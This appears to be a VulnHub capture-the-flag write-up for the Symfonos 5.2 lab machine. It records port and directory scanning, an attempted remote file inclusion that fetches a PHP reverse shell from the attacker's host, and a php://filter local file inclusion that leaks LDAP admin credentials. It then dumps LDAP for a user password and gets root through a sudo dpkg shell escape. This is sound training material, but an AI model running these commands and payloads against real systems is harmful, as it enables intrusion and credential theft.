Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# Nmap 7.92 scan initiated Mon Feb 7 02:29:43 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-5.2/192.168.110.18/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-5.2/192.168.110.18/scans/xml/_full_tcp_nmap.xml 192.168.110.18
adjust_timeouts2: packet supposedly had rtt of -530721 microseconds. Ignoring time.
Nmap scan report for 192.168.110.18
Host is up, received arp-response (0.00073s latency).
Scanned at 2022-02-07 02:29:44 +08 for 20s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfhCNEk87fJIphggJ/K7+9vu2pm9OmRmuYZ4tIPDCr42LgzGp6EIWpz5FXo98F1iq1pNASEjcMqqpCxuhhOFSlf3pPA00Rka4/0pmlmtIl5jSE6cpexIXzINzLC6YXDt59JFuOi0PgsbBYbIWsRdNxPboBDELeilgNairkx3wakNr39Di1SmrpQyQ54EbpusuNZPZL9eBjgEScXrx+MCnA4gyQ+VwEbMXDBfC6q5zO+poZQ1wkAqg9+LFvd2RuwGB+06yFfVn84UpBh4Fxf+cpnKG0zJalRfI8ZhUgnvEnU7cIp8Yb94pUzXf1+m1Vsau8+0myI0aaljHt4RfSfI3T
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHUvkrh2jAIVELCTy59BYzC3B0S4/jKkYOmS6N7anjrxvHW59thSrs7+3pvVhM5X0Og+FV4zkrMMfvw5jwTygeA=
| 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKxA6/wOoEAbxcDJX8zdCYFQzulYfpxK4n4e7bUSUeeC
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl? syn-ack ttl 63
MAC Address: 08:00:27:E9:3A:07 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/7%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=6200
OS:13AC%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4
OS:ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 20.963 days (since Mon Jan 17 03:23:45 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.110.18
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 7 02:30:04 2022 -- 1 IP address (1 host up) scanned in 22.20 seconds
TCP/80 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.18/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.hta.html [Status: 403, Size: 279, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 279, Words: 20, Lines: 10]
.htaccess.html [Status: 403, Size: 279, Words: 20, Lines: 10]
.htpasswd.html [Status: 403, Size: 279, Words: 20, Lines: 10]
.hta [Status: 403, Size: 279, Words: 20, Lines: 10]
.htpasswd.php [Status: 403, Size: 279, Words: 20, Lines: 10]
admin.php [Status: 200, Size: 1650, Words: 707, Lines: 40]
admin.php [Status: 200, Size: 1650, Words: 707, Lines: 40]
.php [Status: 403, Size: 279, Words: 20, Lines: 10]
.html [Status: 403, Size: 279, Words: 20, Lines: 10]
[Status: 200, Size: 207, Words: 18, Lines: 19]
.hta.txt [Status: 403, Size: 279, Words: 20, Lines: 10]
.hta.php [Status: 403, Size: 279, Words: 20, Lines: 10]
.htaccess.txt [Status: 403, Size: 279, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 279, Words: 20, Lines: 10]
.htaccess.php [Status: 403, Size: 279, Words: 20, Lines: 10]
.htpasswd.txt [Status: 403, Size: 279, Words: 20, Lines: 10]
home.php [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 207, Words: 18, Lines: 19]
index.html [Status: 200, Size: 207, Words: 18, Lines: 19]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
static [Status: 301, Size: 317, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 1544 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
admin.php
FFUF - directory-list-2.3-medium.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.18/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
home.php [Status: 302, Size: 0, Words: 1, Lines: 1]
static [Status: 301, Size: 317, Words: 20, Lines: 10]
admin.php [Status: 200, Size: 1650, Words: 707, Lines: 40]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
portraits.php [Status: 200, Size: 165, Words: 10, Lines: 4]
.php [Status: 403, Size: 279, Words: 20, Lines: 10]
[Status: 200, Size: 207, Words: 18, Lines: 19]
.html [Status: 403, Size: 279, Words: 20, Lines: 10]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [882240/882240] :: Job [1/1] :: 4221 req/sec :: Duration: [0:03:44] :: Errors: 0 ::
portraits.php
home.php
Initial Foothold
TCP/80 (HTTP) - LDAP Injection
- View enumerated directories
admin.php
portraits.php
home.php
- redirected to
admin.php
- redirected to
- Determine if
admin.php
is susceptible to SQLi, failed- Results
- Results
- Tried admin:admin, failed
- Determine if
admin.php
is susceptible to LDAP Injection, sinceTCP/389,636 - LDAP
is up- LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input, when fails to properly sanitize user input, it’s possible to modify LDAP statements to bypass login, execute commands.
- Setup
- Results
TCP/80 (HTTP) - File Inclusion
- Redirected to
home.php
url=http://127.0.0.1/portraits.php
- Could be susceptible to LFI/RFI
- RFI2RCE - Failed
- Download
php-reverse-shell.php
- Start a webserver hosting
php-reverse-shell.php
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Download
php-revrese-shell.php
into the victim1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/loot/http] └─# curl -H "Cookie: PHPSESSID=m8sk1907nbfha3ohu1fvls6jp0" http://symfonos.local/home.php?url=http://192.168.110.4/php-reverse-shell.php ┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 192.168.110.18 - - [07/Feb/2022 03:55:58] "GET /php-reverse-shell.php HTTP/1.0" 200 -
- Execute reverse shell
1 2
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# curl -H "Cookie: PHPSESSID=m8sk1907nbfha3ohu1fvls6jp0" http://symfonos.local/home.php?url=http://192.168.110.4/php-reverse-shell.php?
- Failed, php code is not executed.
- Download
- LFI2RCE - Failed
- Fuzz for files in include that could lead to RCE
1 2
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# ffuf -u "http://symfonos.local/home.php?url=../../../../../..FUZZ" -H "Cookie: PHPSESSID=m8sk1907nbfha3ohu1fvls6jp0" -w /usr/share/wordlists/LFI/file_inclusion_linux.txt -fw 117
- Browse through the files, could not find any that leads to RCE
- Fuzz for files in include that could lead to RCE
- Instead of doing RFI, use
PHP wrapper
to view the source codelogin.php
- Able to obtain LDAP credentials
- Base64 Encode
home.php
1 2 3 4 5 6 7
# Payload: ?url=php://filter/convert.base64-encode/resource=admin.php ┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# curl -s -H "Cookie: PHPSESSID=m8sk1907nbfha3ohu1fvls6jp0" 'http://symfonos.local/home.php?url=php://filter/convert.base64-encode/resource=login.php' | curl -s -H "Cookie: PHPSESSID=m8sk1907nbfha3ohu1fvls6jp0" 'http://symfonos.local/home.php?url=php://filter/convert.base64-encode/resource=admin.php' | tail -3 <center> PD9waHAKc2Vzc2lvbl9zdGFydCgpOwoKaWYoaXNzZXQoJF9TRVNTSU9OWyJsb2dnZWRpbiJdKSAmJiAkX1NFU1NJT05bImxvZ2dlZGluIl0gPT09IHRydWUpewogICAgaGVhZGVyKCJsb2NhdGlvbjogaG9tZS5waHAiKTsKICAgIGV4aXQ7Cn0KCmZ1bmN0aW9uIGF1dGhMZGFwKCR1c2VybmFtZSwgJHBhc3N3b3JkKSB7CiAgJGxkYXBfY2ggPSBsZGFwX2Nvbm5lY3QoImxkYXA6Ly8xNzIuMTguMC4yMiIpOwoKICBsZGFwX3NldF9vcHRpb24oJGxkYXBfY2gsIExEQVBfT1BUX1BST1RPQ09MX1ZFUlNJT04sIDMpOwoKICBpZiAoISRsZGFwX2NoKSB7CiAgICByZXR1cm4gRkFMU0U7CiAgfQoKICAkYmluZCA9IGxkYXBfYmluZCgkbGRhcF9jaCwgImNuPWFkbWluLGRjPXN5bWZvbm9zLGRjPWxvY2FsIiwgInFNRGR5WmgzY1Q2ZWVBV0QiKTsKCiAgaWYgKCEkYmluZCkgewogICAgcmV0dXJuIEZBTFNFOwogIH0KCiAgJGZpbHRlciA9ICIoJih1aWQ9JHVzZXJuYW1lKSh1c2VyUGFzc3dvcmQ9JHBhc3N3b3JkKSkiOwogICRyZXN1bHQgPSBsZGFwX3NlYXJjaCgkbGRhcF9jaCwgImRjPXN5bWZvbm9zLGRjPWxvY2FsIiwgJGZpbHRlcik7CgogIGlmICghJHJlc3VsdCkgewogICAgcmV0dXJuIEZBTFNFOwogIH0KCiAgJGluZm8gPSBsZGFwX2dldF9lbnRyaWVzKCRsZGFwX2NoLCAkcmVzdWx0KTsKCiAgaWYgKCEoJGluZm8pIHx8ICgkaW5mb1siY291bnQiXSA9PSAwKSkgewogICAgcmV0dXJuIEZBTFNFOwogIH0KCiAgcmV0dXJuIFRSVUU7Cgp9CgppZihpc3NldCgkX0dFVFsndXNlcm5hbWUnXSkgJiYgaXNzZXQoJF9HRVRbJ3Bhc3N3b3JkJ10pKXsKCiR1c2VybmFtZSA9IHVybGRlY29kZSgkX0dFVFsndXNlcm5hbWUnXSk7CiRwYXNzd29yZCA9IHVybGRlY29kZSgkX0dFVFsncGFzc3dvcmQnXSk7CgokYklzQXV0aCA9IGF1dGhMZGFwKCR1c2VybmFtZSwgJHBhc3N3b3JkKTsKCmlmICghICRiSXNBdXRoICkgewoJJG1zZyA9ICJJbnZhbGlkIGxvZ2luIjsKfSBlbHNlIHsKICAgICAgICAkX1NFU1NJT05bImxvZ2dlZGluIl0gPSB0cnVlOwoJaGVhZGVyKCJsb2NhdGlvbjogaG9tZS5waHAiKTsKCWV4aXQ7Cn0KfQo/Pgo8aHRtbD4KPGhlYWQ+CjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdGF0aWMvYm9vdHN0cmFwLm1pbi5jc3MiPgo8L2hlYWQ+Cjxib2R5PjxiciAvPgo8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InJvdyBqdXN0aWZ5LWNvbnRlbnQtY2VudGVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY29sLW1kLTgiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2FyZCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2FyZC1oZWFkZXIiPkxvZ2luPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2FyZC1ib2R5Ij4KICAgICAgICAgICAgICAgICAgICAgICAgPGZvcm0gYWN0aW9uPSJhZG1pbi5waHAiIG1ldGhvZD0iR0VUIj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAgcm93Ij4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJlbWFpbF9hZGRyZXNzIiBjbGFzcz0iY29sLW1kLTQgY29sLWZvcm0tbGFiZWwgdGV4dC1tZC1yaWdodCI+VXNlcm5hbWU8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC02Ij4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIGlkPSJ1c2VybmFtZSIgY2xhc3M9ImZvcm0tY29udHJvbCIgbmFtZT0idXNlcm5hbWUiIHJlcXVpcmVkIGF1dG9mb2N1cz4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgoKICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAgcm93Ij4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwYXNzd29yZCIgY2xhc3M9ImNvbC1tZC00IGNvbC1mb3JtLWxhYmVsIHRleHQtbWQtcmlnaHQiPlBhc3N3b3JkPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtNiI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgaWQ9InBhc3N3b3JkIiBjbGFzcz0iZm9ybS1jb250cm9sIiBuYW1lPSJwYXNzd29yZCIgcmVxdWlyZWQ+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtNiBvZmZzZXQtbWQtNCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXByaW1hcnkiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMb2dpbgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvYnV0dG9uPgoJCQkgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Zvcm0+CiAgICAgICAgICAgICAgICA8L2Rpdj4KPGNlbnRlcj48c3Ryb25nPjw/cGhwIGVjaG8gJG1zZzsgPz48L3N0cm9uZz48L2NlbnRlcj4KPC9kaXY+CjwvYm9keT4KPC9odG1sPgoK</center> </body>
- Decoded
cn=admin,dc=symfonos,dc=local
:qMDdyZh3cT6eeAWD
TCP/389 (LDAP) - Extract Info from LDAP
- Extract all information from domain
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# ldapsearch -x -h $ip -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local' # extended LDIF # # LDAPv3 # base <dc=symfonos,dc=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # symfonos.local dn: dc=symfonos,dc=local objectClass: top objectClass: dcObject objectClass: organization o: symfonos dc: symfonos # admin, symfonos.local dn: cn=admin,dc=symfonos,dc=local objectClass: simpleSecurityObject objectClass: organizationalRole cn: admin description: LDAP administrator userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0= # zeus, symfonos.local dn: uid=zeus,dc=symfonos,dc=local uid: zeus cn: zeus sn: 3 objectClass: top objectClass: posixAccount objectClass: inetOrgPerson loginShell: /bin/bash homeDirectory: /home/zeus uidNumber: 14583102 gidNumber: 14564100 userPassword:: Y2V0a0tmNHdDdUhDOUZFVA== mail: zeus@symfonos.local gecos: Zeus User # search result search: 2 result: 0 Success # numResponses: 4 # numEntries: 3
- Decode password
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-5.2/192.168.110.18/exploit] └─# echo -n Y2V0a0tmNHdDdUhDOUZFVA== | base64 -d cetkKf4wCuHC9FET
- zeus:cetkKf4wCuHC9FET
TCP/22 (SSH)
- SSH w/ zeus:cetkKf4wCuHC9FET
Privilege Escalation
Root - Via Sudo (GTFO Bins)
- Check sudo access
1 2 3 4 5 6
zeus@symfonos5:~$ sudo -l Matching Defaults entries for zeus on symfonos5: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User zeus may run the following commands on symfonos5: (root) NOPASSWD: /usr/bin/dpkg
dpkg
has a GTFOBins entry
- Exploit
1 2
sudo dpkg -l !/bin/sh
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
# cd /root # ls proof.txt # cat proof.txt Congrats on rooting symfonos:5! ZEUS * . dZZZZZ, . * dZZZZ ZZ, * . ,AZZZZZZZZZZZ `ZZ,_ * ,ZZZZZZV' ZZZZ `Z,`\ ,ZZZ ZZ . ZZZZ `V * ZZZZV' ZZ ZZZZ \_ . . V l . ZZ ZZZZZZ . l \ ZZ, ZZZ ZZZZZZ, . / ZZ l ZZZ ZZZ `Z, ZZ l ZZZ Z Z, `Z, * . ZZ ZZZ Z Z, `l Z ZZ V `Z \ V ZZC l V Z l V ZR l . \ \ l ZA \ C C \ K / / K A \ \ | / / / \ \\|/ / / __________________________________\|/_________________________ Contact me via Twitter @zayotic to give feedback! #
Comments powered by Disqus.